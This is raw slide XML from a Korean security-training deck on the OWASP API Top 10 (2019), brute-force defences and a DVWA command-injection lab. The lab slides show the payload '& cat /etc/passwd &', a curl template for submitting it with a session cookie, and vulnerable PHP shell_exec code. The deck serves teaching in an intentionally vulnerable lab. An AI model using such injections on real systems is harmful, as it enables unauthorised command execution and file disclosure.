          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="808264" y="2451531"/>
          <a:ext cx="5565894" cy="67233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889">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="147902923"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3180005">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3730846113"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="241395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OWASP TOP 10 (2019)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14594"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="34661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A1 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>취약한 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>Object </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>수준 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API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t>가 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t>object </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t>식별자를 처리하는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t>Endpoint</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t>를 노출시키곤 하며 이는 표면 수준의 접근통제 문제에 대한 광범위한 공격을 야기시킬 수 있다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86281"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6189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A2 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>취약한 유저 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인증 메커니즘이 부적절하게 실행되어 공격자로 하여금 암호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키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 err="1"/>
                        <a:t>세션토큰을</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t> 노출시키거나 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0" err="1"/>
                        <a:t>일시적</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0" err="1">
                          <a:latin typeface="Bell MT" panose="02020503060305020303" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>∙영구적으로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Bell MT" panose="02020503060305020303" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t> 다른 사용자의 권한을 획득하게 한다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0">
                          <a:latin typeface="Bell MT" panose="02020503060305020303" pitchFamily="18" charset="0"/>
                        </a:rPr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778599"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4827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A3 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>과도한 데이터 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개발자들이 전체적인 구현을 목적으로 모든 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t>object </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t>속성을 각각의 보안적인 고려 없이 노출시키는 경향이 있다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47701"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4827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A4 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>자원고갈 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>&amp; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>속도제한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API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t>에서 자원들의 크기와 양에 대한 제한을 두지 않을 경우  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t>DDOS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t>공격과 무제한 대입공격에 취약해진다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876437"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4827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A5 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>취약한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기능 단위 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서로 다른 체계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구조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그룹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등 간에 복잡한 접근 통제 정책과 관리자기능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일반 기능 간 불명확한 분리가 인증 결함을 야기시킨다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168456"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="75513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A6 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>대량 할당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클라이언트에서 제공한 데이터를 화이트리스트 기반의 적절한 속성 필터링 없이 데이터 모델에 바인딩하면 대량 할당으로 이어진다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t>이런 과정에서 공격자로 인해 의도치 않은 개체 속성 수정이 발생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3944336"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4827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A7 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>잘못된 보안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취약한 기본 설정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미완성의 임시 설정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클라우드 스토리지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잘못 구성된 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t>http </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t>헤더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불필요한 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t>http </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t>메소드</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t>등이 있다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833199"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="618961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A8 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
                        <a:t>인젝션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신뢰할 수 없는 데이터가 명령 또는 쿼리문의 일부분으로서 인터프리터에게 전달될 때 발생하며</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t> 이를 통해 공격자가 적절한 인증 없이 명령을 실행하거나 데이터에 접근할 수 있다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3734982"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="48278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A9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부적절한 자산 관리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dirty="0"/>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t>는 구버전의 웹 어플리케이션보다도 더 많은 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t>Endpoint</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t>들을 노출시키곤 하며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적절하게 업데이트 된 문서를 만드는 것이 중요하다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560743"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="755132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A10 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" spc="-150" dirty="0"/>
                        <a:t>불충분 한 로깅 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" spc="-150" dirty="0"/>
                        <a:t>&amp; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" spc="-150" dirty="0"/>
                        <a:t>모니터링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50" dirty="0"/>
                        <a:t>불충분한 로깅과 모니터링은 사고 대응의 비효율적인 통합 또는 누락과 함께 공격자들이 지속성을 유지하여 시스템을 더 공격하고 더 많은 시스템을 중심으로 공격하게 하여 데이터를 변조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추출</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t>파괴한다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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407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056405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7.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Impossible)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7" name="그림 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97D8F6F9-52A6-4113-B923-F9CFF895B9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r="363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impossible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레벨의 소스와 해석이다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85751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7.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Impossible)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D3F7D55E-D14F-4894-8E24-CAFA1A5837E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4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impossible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레벨의 소스와 해석이다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401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7.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Impossible)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5AF2E3E5-C469-4FBF-B7A3-0F88F7E39C0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9" r="4309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impossible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레벨의 소스와 해석이다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High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모드에서 확인했던 로그인 실패 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Sleep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 걸리는 코드에 로그인 시도가 일정 회수에 도달하면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15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분 동안 로그인 금지를 시켜 더욱이 오랜 시간이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걸리게 하는 방식으로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brute force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공격을 방지 하는 코드이다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7872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8.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방어 대책</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="그림 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C550626B-3F5F-44A2-B2BF-7A698A88BE7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" b="1943"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="5911850" cy="4686300"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-34290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Brute force Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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은 짧은 시간 내에 일정 횟수 이상 로그인 시도에 실패 하면 정해진 시간 동안 로그인 하지 못하게 하는 방법으로 대응 할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="2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.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 하지만 오히려 이점을 노리고 특정 사용자의 아이디를 이용하여 일부러 틀려 해당 사용자가 사이트에 접근 하지 못하게 하는 단점도 있기에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위의 이미지인 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CAPTCHA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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이용하여 자동화 프로그램으로 인식하기 불가능하게 함으로 공격을 차단 할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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kumimoji="0" lang="en-US" altLang="ko-KR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3-1) Brute Force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89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6C5898-8357-4C26-8A5A-064F4672E949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="-670563" y="2547033"/>
            <a:ext cx="8229602" cy="2355849"/>
            <a:chOff x="541658" y="2057401"/>
            <a:chExt cx="8061962" cy="2355849"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="평행 사변형 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{594FB019-8F79-4C25-89D9-4E6888C5E8CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="541658" y="2057401"/>
              <a:ext cx="5927723" cy="2355847"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst/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평행 사변형 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E22650C1-1F7F-4CA1-9AE7-F3739B437E13}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5976016" y="2057403"/>
              <a:ext cx="2627604" cy="2355847"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 26157"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="204E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5813" y="3048507"/>
            <a:ext cx="4485405" cy="1352903"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/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j-cs"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="4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D46AB0-0C28-4D7C-8C3B-D67E479EA7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="159933" y="3309457"/>
            <a:ext cx="2193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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6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6600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54004" y="62738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개요 및 설정</a:t>
            </a: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개요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Command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Injection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은 보안적으로 취약한 어플리케이션에서 시스템 명령어를 호출하는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인자값을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조작하여 공격자가 지정한 시스템 명령어를 입력 및 실행하는 것이다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공격 목표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원격으로 호스트이름 및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 웹서비스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유저명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식별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3)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프로젝트 환경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Kali-Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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os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 (Security Level: Low ~ Impossible)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대상으로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 Suite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툴을 활용하여 진행한다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4)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그 외 기타 환경은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DVWA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 동일하다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6951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사전 탐색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- IP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주소 입력 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Ping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을 보내는 사이트가 구현되어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  <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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출력되는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ping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송신 형식이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Linux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 같으며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이를 통해 페이지가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Linux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방식의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시스템명령어를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직접 사용함을 확인할 수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4F7B20-7B3D-4A2C-9EBC-7530D71C4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7" y="2616465"/>
            <a:ext cx="5594309" cy="213333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401C85F0-14D1-47A2-A611-B5D962AA5AB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3383340" y="5397768"/>
            <a:ext cx="2630078" cy="2039463"/>
            <a:chOff x="3539637" y="7024687"/>
            <a:chExt cx="2630078" cy="203946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60A013-A34D-4FBB-89F7-F3156F393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300" y="7024687"/>
              <a:ext cx="2626415" cy="162401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891A14-A404-446B-A568-27E51F1773B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3539637" y="8694818"/>
              <a:ext cx="25798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나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
                </a:rPr>
                <a:t>Ping </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                  <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
                </a:rPr>
                <a:t>출력형태</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                  <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
                </a:rPr>
                <a:t>(Windows)</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101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3A711B9-08CC-4503-967A-0AE2370A3DBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="525137" y="5372105"/>
            <a:ext cx="2497464" cy="2034383"/>
            <a:chOff x="525137" y="5257801"/>
            <a:chExt cx="2497464" cy="2034383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B7D4D8E-DF77-4753-9B0B-E3871854F50D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="525137" y="5257801"/>
              <a:ext cx="2497463" cy="2034383"/>
              <a:chOff x="525137" y="7024687"/>
              <a:chExt cx="2497463" cy="2034383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BBAEE03A-9B9A-486D-B565-6F1D1C06C6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137" y="7024687"/>
                <a:ext cx="2497463" cy="1624013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ADCA5F-A517-4B9C-92C8-AEE7212A7547}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="674849" y="8689738"/>
                <a:ext cx="21980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ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
                  </a:rPr>
                  <a:t>Ping </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                    <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
                  </a:rPr>
                  <a:t>출력형태</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                    <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
                  </a:rPr>
                  <a:t>(Linux)</a:t>
                </a:r>
                <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
                  <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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37F00C1-9CFB-47CD-A953-09F3C2D99564}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="525137" y="5269671"/>
              <a:ext cx="2497464" cy="160027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82141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Command Injection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cat /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etc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/passwd &amp;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입력시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ping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 대신 명령어 수행 결과가 출력된다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이를 통해 이 사이트에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Command Injection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취약점이 존재한다는 것을 확인할 수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5820A3-231D-4F58-B91E-E91EF4E25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92" y="2851665"/>
            <a:ext cx="5859808" cy="3599199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61082BB-E138-4A49-97E1-A109BDC5AD28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575777" y="2425127"/>
            <a:ext cx="5736954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&amp; cat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/passwd &amp;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12616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2) Command Injection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시도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- 2</a:t>
            </a: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Burp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Shuit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이용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앞서 진행했던 쿠키정보를 바탕으로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curl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명령어를 통해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ping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및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cat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 동시 실행과 웹페이지 시스템 정보를 확인할 수 있다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61082BB-E138-4A49-97E1-A109BDC5AD28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540992" y="2671887"/>
            <a:ext cx="5736954" cy="30771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curl –cookie “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쿠키정보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” [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실행주소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url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)] –data “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입력 데이터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＂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365C5A-5F74-4A45-B4BD-8ED905781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2" y="3882978"/>
            <a:ext cx="5736954" cy="14740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ACE04A4-3B46-485B-81CD-8569D8632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22" y="5563905"/>
            <a:ext cx="5736955" cy="35846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7CD996-CDCC-4014-9DA2-5F8B8A869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2" y="6023022"/>
            <a:ext cx="5736953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869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a typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>2) Low Level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 소스코드 분석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71C3C463-FD29-416F-A683-E1D592ECFCFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560523" y="2541897"/>
            <a:ext cx="5736954" cy="672148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isset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$_POST[ 'Submit' ]  ) ) {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Get input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$target = $_REQUEST[ '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' ];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Determine OS and execute the ping command.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if(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stristr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php_uname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's' ), 'Windows NT' ) ) {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// Windows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cmd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=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shell_exec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'ping  ' . $target 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}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else {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// *nix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cmd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=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shell_exec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'ping  -c 4 ' . $target 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}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Feedback for the end user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echo "&lt;pre&gt;{$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cmd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}&lt;/pre&gt;";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 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A4EFB5-8A0D-480B-8000-F5256FD15075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202450" y="2627563"/>
            <a:ext cx="4968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#isset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으로 변수가 설정되었는지 확인 후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TRUE/FALSE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반환</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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#isset( $_POST[ 'Submit' ]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은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POST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요청의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Submit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값을 가져옴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15351-E47A-49A8-828F-DBD59794ACEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="912404" y="3695752"/>
            <a:ext cx="4908716" cy="518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#_REQUEST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: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사용자가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get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방식이든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post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방식이든 상관없이</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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변수의 데이터를 값으로 받아 배열로 저장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 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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F5A63-3D2B-432F-B20C-7C73E08659F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950744" y="5141871"/>
            <a:ext cx="5385074" cy="943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#pyp_uname(‘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모드’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 : php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사용하여 사용환경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os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과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host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획득</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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모드 종류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: a(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1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모든정보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), s(OS), n(hostname), r(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릴리즈 이름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), v(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버전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정보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), m(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머신 형식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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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A59278-244E-4756-91E5-848B42ACC832}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314132" y="6658413"/>
            <a:ext cx="3799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target(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입력 값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을 활용하여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ping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명령어 수행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1047BE-61BF-4FFE-BB7B-BDF80A0003B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="912404" y="4599067"/>
            <a:ext cx="4319861" cy="647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#stristr(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1,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변수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2) :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대상 문자열에서 찾고자 하는 문자열이 처음으로 나타나는 위치 이후의 문자열을 반환</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272823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3" y="622298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100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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B3443ADE-1D9D-4A28-A056-276AC21D4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1. OWASP TOP 10 2019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F13410C-B042-4AB2-B474-4647A515B677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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="200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. </a:t>
            </a:r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OWASP, DVWA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BC23C146-358E-4FBC-B122-4B70E35BAE25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471487" y="1968498"/>
            <a:ext cx="5902671" cy="6953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2)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OWASP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Top 10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(2017)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vs OWASP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Top 10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(2019)</a:t>
            </a:r>
          </a:p>
          <a:p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59A31085-57CC-4FA9-B6FE-AEAEBC1B085A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="854814" y="2354466"/>
          <a:ext cx="5425670" cy="505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2835">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="147902923"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2712835">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="37308461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pc="0" dirty="0"/>
                        <a:t>OWASP TOP 10 (2017)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" spc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OWASP TOP 10 (2019)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14594"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="475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0" dirty="0"/>
                        <a:t>A1 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" spc="0" dirty="0" err="1"/>
                        <a:t>인젝션</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US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spc="0" dirty="0"/>
                        <a:t>A1 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1" spc="0" dirty="0"/>
                        <a:t>취약한 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1" spc="0" dirty="0"/>
                        <a:t>Object </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1" spc="0" dirty="0"/>
                        <a:t>수준 인증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386281"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="475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0" dirty="0"/>
                        <a:t>A2 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" spc="0" dirty="0"/>
                        <a:t>취약한 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spc="0" dirty="0"/>
                        <a:t>A2 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1" spc="0" dirty="0"/>
                        <a:t>취약한 유저 인증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4778599"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="475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0" dirty="0"/>
                        <a:t>A3 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" spc="0" dirty="0"/>
                        <a:t>주요 데이터 노출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spc="0" dirty="0"/>
